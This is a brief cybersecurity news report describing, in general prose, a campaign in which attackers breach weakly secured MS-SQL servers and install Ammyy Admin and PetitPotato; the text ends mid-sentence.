Hackers Exploit MS-SQL Servers to Deploy Ammyy Admin for Remote Access

A sophisticated cyberattack campaign has surfaced, targeting poorly managed Microsoft SQL (MS-SQL) servers to deploy malicious tools like Ammyy Admin and PetitPotato malware.

Cybersecurity researchers have observed attackers exploiting vulnerabilities in these servers to gain unauthorized access, execute commands for reconnaissance, and install malware that facilitates remote access and privilege escalation.

This emerging threat underscores the critical need for robust security measures to protect database environments, which are often a gateway to sensitive organizational data.

New Threat Campaign Targets Vulnerable Database Servers

The attack begins with adversaries identifying and exploiting misconfigured or unpatched MS-SQL servers, leveraging weak credentials or known vulnerabilities to infiltrate systems.

Once inside, they execute commands to gather detailed system information, mapping out the environment for further exploitation.

The attackers then use tools like WGet to download and install malware payloads, including Ammyy Admin, a legitimate remote desktop software frequently abused for malicious purposes, and PetitPotato, a ...